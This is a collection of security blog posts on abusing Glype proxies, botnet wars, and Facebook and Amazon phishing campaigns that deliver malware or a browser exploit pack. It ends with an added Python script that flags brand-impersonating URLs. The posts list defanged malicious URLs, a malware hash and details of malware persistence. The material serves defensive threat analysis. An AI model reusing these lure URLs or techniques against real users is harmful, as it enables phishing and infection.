Aditya K Sood (http://www.blogger.com/profile/10592122467317696329)<br />
<br />
<b>Elsevier Network Security : Abusing Glype Proxies</b> (published 2013-01-09T08:12:00.002-08:00, updated 2014-03-29T14:06:38.138-07:00)<div class="separator" style="clear: both; text-align: center;">
<a href="http://ars.els-cdn.com/content/image/1-s2.0-S1353485812X70120-cov150h.gif" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://ars.els-cdn.com/content/image/1-s2.0-S1353485812X70120-cov150h.gif" /></a></div>
<b>Update : 29th April 2014</b><br />
<b><br /></b>
<b>Download : Paper available here</b>: <a href="http://www.slideshare.net/adityaks/abusing-glype-proxies-exploits-and-defences" target="_blank"><b>http://www.slideshare.net/adityaks/abusing-glype-proxies-exploits-and-defences</b></a><br />
<br />
Our paper on "Abusing Glype Proxies: Attacks, Exploits and Defenses" is out in Elsevier Network Security.<br />
<br />
Abstract: <span style="background-color: white; color: #2e2e2e; font-family: 'Arial Unicode MS', 'Arial Unicode', Arial, 'URW Gothic L', Helvetica, Tahoma, sans-serif; font-size: 13px; line-height: 20px; text-align: justify; word-spacing: -0.15ex;">Proxies play a critical privacy role because these are widely used for anonymous surfing and identity cloaking on the Internet. In addition, proxies also assist in traffic filtering, traffic management, log auditing, access policies and surfing restricted sites. There are several types of proxies available, but the Glype HTTP proxy is used extensively.</span><br />
<div id="spara50" style="background-color: white; border: 0px; color: #2e2e2e; font-family: 'Arial Unicode MS', 'Arial Unicode', Arial, 'URW Gothic L', Helvetica, Tahoma, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 9px; padding: 0px; text-align: justify; vertical-align: baseline; word-spacing: -0.15ex;">
The Glype open-source HTTP proxy is used extensively. However, proxies can be transformed into attack platforms for exploitation. </div>
<div id="spara50" style="background-color: white; border: 0px; color: #2e2e2e; font-family: 'Arial Unicode MS', 'Arial Unicode', Arial, 'URW Gothic L', Helvetica, Tahoma, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 9px; padding: 0px; text-align: justify; vertical-align: baseline; word-spacing: -0.15ex;">
<br /></div>
<div id="spara50" style="background-color: white; border: 0px; color: #2e2e2e; font-family: 'Arial Unicode MS', 'Arial Unicode', Arial, 'URW Gothic L', Helvetica, Tahoma, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 9px; padding: 0px; text-align: justify; vertical-align: baseline; word-spacing: -0.15ex;">
Fetch: <b><a href="http://www.sciencedirect.com/science/article/pii/S1353485812701125" target="_blank">http://www.sciencedirect.com/science/article/pii/S1353485812701125</a>.</b></div>
<div id="spara50" style="background-color: white; border: 0px; color: #2e2e2e; font-family: 'Arial Unicode MS', 'Arial Unicode', Arial, 'URW Gothic L', Helvetica, Tahoma, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 9px; padding: 0px; text-align: justify; vertical-align: baseline; word-spacing: -0.15ex;">
<br /></div>
<div id="spara50" style="background-color: white; border: 0px; color: #2e2e2e; font-family: 'Arial Unicode MS', 'Arial Unicode', Arial, 'URW Gothic L', Helvetica, Tahoma, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 9px; padding: 0px; text-align: justify; vertical-align: baseline; word-spacing: -0.15ex;">
Enjoy!</div>
Aditya K Sood (http://www.blogger.com/profile/10592122467317696329)<br />
<br />
<b>HITB EZine : Bot Wars - The Game of Win32/64 TakeOver</b> (published 2012-12-02T07:19:00.000-08:00, updated 2012-12-02T07:19:19.253-08:00)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://magazine.hackinthebox.org/images/hitb-magazinecover.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="200" src="http://magazine.hackinthebox.org/images/hitb-magazinecover.jpg" width="148" /></a></div>
Botnets have been in existence for years. Third Generation Botnets (TGBs) use sophisticated attack vectors to infect users at a large scale. Botnets are cyber weapons that can jeopardize the integrity and security of critical infrastructure on the Internet. There is an insidious war going on among different generations of botnets to exploit the target systems. This concept is termed bot wars. This article explores the details of bot wars and how the bots kill each other to control the infected systems.<br />
<br />
The paper is out in the 9th edition of HITB Ezine. Fetch the magazine from here: <a href="http://magazine.hackinthebox.org/issues/HITB-Ezine-Issue-009.pdf" target="_blank"><b>http://magazine.hackinthebox.org/issues/HITB-Ezine-Issue-009.pdf</b></a><br />
Aditya K Sood (http://www.blogger.com/profile/10592122467317696329)<br />
<br />
<b>Attribution - Team Cyberthack and The Game of Facebook Phishing Attack - Tracking Back</b> (published 2012-10-10T09:14:00.000-07:00, updated 2013-04-01T16:36:02.463-07:00)<div class="separator" style="clear: both; text-align: left;">
This Facebook case study is an interesting one, based on an ongoing Facebook phishing attack that leads to malware. Interestingly, the attack seems to have been launched by Indonesian and Spanish hackers, judging by the languages used in the deployed code. Our team came across a Facebook phishing email embedded with a video and other malicious links. Every single URL pointed to the same domain. The Facebook message embedded in the email carried a notification that says something as follows:</div>
<br />
<i>""Miiiii lindoooo! Ahahahaha this videoo muestrezzz not what to nadiesss = $ $ $ $ ZIII? Tiii is for! Because? Yoooo muxiiiisisisisizimoooo amoooo you! Muxo like me will I require your videooo montonezzzz!! porfiz when estez at ............ "Read more </i><i><b>This video was ranked No one under 18</b>." </i><br />
<br />
The original message is presented below:<br />
<br />
<i>"Miiiii lindoooo!!! ahahahaha este videoo no se lo muestrezzz a nadiesss =$$$$ ziii ?? es solo para tiii!! porque ? yoooo te amoooo muxiiiisisisisizimoooo!!! me gusto muxo tu videooo te requiero montonezzzz!!!! porfiz cuando estez en. ..... . ....." Leer mas</i><br />
<br />
<i>Este video fue clasificado Prohibido para menores de 18 años .</i><br />
<i><br /></i>
The phishing email was structured as shown below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-qxw5Flia9bk/UHWNTo2BteI/AAAAAAAABTo/lfBqpFPayZU/s1600/facebook_phishing_video_email.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="340" src="http://4.bp.blogspot.com/-qxw5Flia9bk/UHWNTo2BteI/AAAAAAAABTo/lfBqpFPayZU/s400/facebook_phishing_video_email.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Before looking into the kind of malware served by this phishing attack, let's dissect the other relevant information gathered from this malicious domain. The facts are discussed as follows:</div>
<br />
1. The domain was compromised by the Cyberthack Team.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-EfbxppDq1VE/UHWPZc-vbvI/AAAAAAAABTw/OEqSN17vOHs/s1600/team_cyberthack_phishing.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="241" src="http://3.bp.blogspot.com/-EfbxppDq1VE/UHWPZc-vbvI/AAAAAAAABTw/OEqSN17vOHs/s400/team_cyberthack_phishing.png" width="400" /></a></div>
<br />
2. On analyzing further, we found information embedded in the web pages about a user profile. We cannot say whether this profile is legitimate or fake at this point, but it is worthwhile to look into it. The profile is presented below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-MQUIjJpyLas/UHWQQo6ebQI/AAAAAAAABT4/01Qt4q9yD4I/s1600/team_cyberthack_phishing_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="245" src="http://3.bp.blogspot.com/-MQUIjJpyLas/UHWQQo6ebQI/AAAAAAAABT4/01Qt4q9yD4I/s400/team_cyberthack_phishing_2.png" width="400" /></a></div>
<br />
3. Some of the JavaScripts that are used in this malware domain are taken from <a href="http://cirebon-cyber4rt.blogspot.com/" target="_blank">http://cirebon-cyber4rt.blogspot.com/</a>. Guys, it is always good to remove the comments when you are doing this kind of job.<br />
<br />
4. Again, a configuration flaw in the web server running on this malicious domain allowed us to access a custom statistics page that listed the visitors to that link. It is shown below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-3-cSElWtCEo/UHWUbcEFwGI/AAAAAAAABUQ/l5zTlBgGhSY/s1600/team_cyberthack_phishing_5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="176" src="http://3.bp.blogspot.com/-3-cSElWtCEo/UHWUbcEFwGI/AAAAAAAABUQ/l5zTlBgGhSY/s400/team_cyberthack_phishing_5.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
The language used in this page is Spanish. It is easy to decipher the number of visitors that visited this page.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
5. The malicious link downloaded the facebook.exe executable on the victim machine. Some of the facts are listed below:</div>
<div class="separator" style="clear: both; text-align: left;">
5.1 The malicious program is written in Visual Basic.</div>
<div class="separator" style="clear: both; text-align: left;">
5.2 No packer is used to pack the critical sections. No code obfuscation is used.</div>
<div class="separator" style="clear: both; text-align: left;">
5.3 The malicious program uses a reference to TortoiseBlame - <a href="http://tortoisesvn.tigris.org/blame.html" target="_blank">http://tortoisesvn.tigris.org/blame.html</a>. It seems like the malware tries to look legitimate.</div>
<div class="separator" style="clear: both; text-align: left;">
5.4 The malware executes silently in the system and, on successful installation, opens the facebook.com web page.</div>
<div class="separator" style="clear: both; text-align: left;">
5.5 The malware creates wincal.exe in the %systemroot% folder and uses the registry to load it. It is again a Visual Basic file.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
For an additional check, the VirusTotal analysis is here: <a href="https://www.virustotal.com/file/a64c6d344626ca983979042485a2b8b271ae08f1e411511227700591c2418ac1/analysis/" target="_blank">https://www.virustotal.com/file/a64c6d344626ca983979042485a2b8b271ae08f1e411511227700591c2418ac1/analysis/</a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Stay secure. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Note: This attack is still active.</div>
Aditya K Sood (http://www.blogger.com/profile/10592122467317696329)<br />
<br />
<b>Did You Order HDTV from Amazon? - Yes | No, Phishers Targeting Amazon Brand !</b> (published 2012-09-20T20:54:00.002-07:00, updated 2013-02-12T06:14:06.842-08:00)<br />
The concept, and the attack, are the same as before. This time attackers are using the Amazon brand to spread infections on the Internet. The phishing email is drafted really well and shows that an order of a new product (HDTV) has been processed. The email looks as follows:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-dmENS3OtUJ8/UFvgvSDDBYI/AAAAAAAABS4/jpLgWPlYFhY/s1600/amazon_phishing_email.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="432" src="http://2.bp.blogspot.com/-dmENS3OtUJ8/UFvgvSDDBYI/AAAAAAAABS4/jpLgWPlYFhY/s640/amazon_phishing_email.png" width="640" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The browser is redirected to a web page showing the following notification:</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-Aq0fE9Ot3lo/UFvg_4BUpCI/AAAAAAAABTA/W7qMFXsjYds/s1600/amazon_phishing_email_note_.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="330" src="http://4.bp.blogspot.com/-Aq0fE9Ot3lo/UFvg_4BUpCI/AAAAAAAABTA/W7qMFXsjYds/s640/amazon_phishing_email_note_.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The script looks as shown below:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-mjKY4bOt9Pg/UFvhv84vsNI/AAAAAAAABTI/4JA0kg9LM-I/s1600/amazon_phishing_email1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="230" src="http://2.bp.blogspot.com/-mjKY4bOt9Pg/UFvhv84vsNI/AAAAAAAABTI/4JA0kg9LM-I/s640/amazon_phishing_email1.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The deobfuscation results in the following code.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-oaBt0aB-_kQ/UFvihC-MQdI/AAAAAAAABTQ/Ixbq6JtroPY/s1600/amazon_phishing_email2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="190" src="http://3.bp.blogspot.com/-oaBt0aB-_kQ/UFvihC-MQdI/AAAAAAAABTQ/Ixbq6JtroPY/s640/amazon_phishing_email2.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Again, the iframe loads content from a third-party domain hosting a Browser Exploit Pack (BEP). The interesting fact is that we received a number of these emails within a short span of time. Every new phishing email had a new embedded URL, as follows:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
hxxp://shuraki.com/wp-admin/hdtvamazon.html [WordPress]</div>
<div class="separator" style="clear: both; text-align: left;">
hxxp://swishmedia.ca/clients/amazinhdtv.html [Generic]</div>
<div class="separator" style="clear: both; text-align: left;">
hxxp://tainguyenso.com/admincp/amazinhdtv.html [V Bulletin]</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
These emails look very genuine and authentic. It is highly advised to be paranoid and to think twice before interacting with these emails.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Check the previous post about the LinkedIn phishing attack - <a href="http://secniche.blogspot.com/2012/08/linekedin-invitation-phishing-blackhole.html" target="_blank">http://secniche.blogspot.com/2012/08/linekedin-invitation-phishing-blackhole.html</a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
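Both phishing cases above share one tell: the lure names a brand (Amazon, Facebook) in the page name or link text, but the link itself lands on an unrelated, often compromised, site (a WordPress wp-admin directory, a vBulletin admincp directory). The following Python script is an added example and not code from this blog or from SecNiche; it turns that observation into a triage check a mail or proxy team could run over extracted URLs. It refangs hxxp:// links, finds brand names or near-misses of them (so "amazinhdtv" is caught as well as "hdtvamazon"), compares the registrable domain against a small constructed allowlist of genuine brand domains, and notes CMS admin paths as a hint that the host is compromised rather than purpose-built. The allowlist, the naive registrable-domain rule (a stand-in for the public suffix list), and the legitimate and benign sample URLs are assumptions; the three defanged lure URLs are the ones quoted in the post above.

```python
"""Brand-impersonation triage for phishing URLs (added example, not the blog's code)."""
import re
from urllib.parse import urlsplit

# Legitimate domains per brand. Constructed allowlist for the example; a real
# deployment would keep a fuller list and use the public suffix list.
BRAND_DOMAINS = {
    "amazon": {"amazon.com", "amazon.co.uk", "amazon.de"},
    "facebook": {"facebook.com", "fb.com"},
}

# Path markers the post tags its lure URLs with: a phishing page sitting in a
# CMS admin directory usually means a compromised site, not one built for the lure.
CMS_PATH_MARKERS = {
    "/wp-admin/": "WordPress",
    "/admincp/": "vBulletin",
}


def refang(url: str) -> str:
    """Turn a defanged URL (hxxp://, hxxps://) back into a parseable one."""
    return re.sub(r"^hxxp(s?)://", r"http\1://", url, flags=re.IGNORECASE)


def registered_domain(host: str) -> str:
    """Naive registrable domain: the last two labels, or three when the second-level
    label is a common shared one such as 'co' (amazon.co.uk). This is a simplification
    standing in for the public suffix list."""
    labels = host.lower().rstrip(".").split(".")
    if len(labels) >= 3 and labels[-2] in {"co", "com", "net", "org", "ac", "gov"}:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def levenshtein(a: str, b: str) -> int:
    """Plain edit distance, used to catch misspelled brand names in lure pages."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def brand_lookalikes(text: str, max_distance: int = 1) -> set:
    """Brands whose name, or a near-miss of it (edit distance <= max_distance), occurs
    inside any alphabetic run of `text`. Sliding windows of brand length +/- 1 are
    compared, so 'amazinhdtv' matches 'amazon' just as 'hdtvamazon' does."""
    found = set()
    for token in re.findall(r"[a-z]+", text.lower()):
        for brand in BRAND_DOMAINS:
            n = len(brand)
            for width in (n - 1, n, n + 1):
                for start in range(0, max(1, len(token) - width + 1)):
                    window = token[start:start + width]
                    if window and levenshtein(window, brand) <= max_distance:
                        found.add(brand)
                        break
    return found


def assess(url: str) -> dict:
    """Flag a URL that mentions a brand while its registrable domain is not that brand's."""
    parts = urlsplit(refang(url))
    host = parts.hostname or ""
    reg = registered_domain(host)
    brands = brand_lookalikes(host + " " + parts.path)
    impersonated = sorted(b for b in brands if reg not in BRAND_DOMAINS[b])
    cms = next((name for marker, name in CMS_PATH_MARKERS.items()
                if marker in parts.path.lower()), None)
    return {
        "url": url,
        "registered_domain": reg,
        "brands_mentioned": sorted(brands),
        "impersonates": impersonated,
        "cms_admin_path": cms,
        "suspicious": bool(impersonated),
    }


# The three lure URLs quoted in the post (left defanged), plus constructed
# legitimate and benign URLs for contrast.
SAMPLE_URLS = [
    "hxxp://shuraki.com/wp-admin/hdtvamazon.html",
    "hxxp://swishmedia.ca/clients/amazinhdtv.html",
    "hxxp://tainguyenso.com/admincp/amazinhdtv.html",
    "https://www.amazon.com/gp/css/order-history",   # constructed: genuine brand domain
    "hxxp://amazon.com.example.net/login.html",      # constructed: brand as a subdomain label
    "https://example.org/clients/report.html",       # constructed: no brand at all
]


def triage(urls=SAMPLE_URLS) -> list:
    """Assess every URL in the list; returns one result dict per URL, in order."""
    return [assess(u) for u in urls]


if __name__ == "__main__":
    for r in triage():
        flag = "SUSPICIOUS" if r["suspicious"] else "ok        "
        print(f'{flag} {r["url"]}  domain={r["registered_domain"]} '
              f'impersonates={r["impersonates"]} cms={r["cms_admin_path"]}')
```

The brand-in-path-but-foreign-domain rule is deliberately loose: a mention of the brand inside the hostname (the constructed amazon.com.example.net case) is scored the same way as one in the path, since both rely on the reader glancing at the familiar name and not at the registrable domain. A CMS admin marker does not by itself make a URL suspicious in this example; it is surfaced so the analyst knows the hosting site is probably a compromised third party, which is how the post describes these lures.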
Aditya K Sood (http://www.blogger.com/profile/10592122467317696329)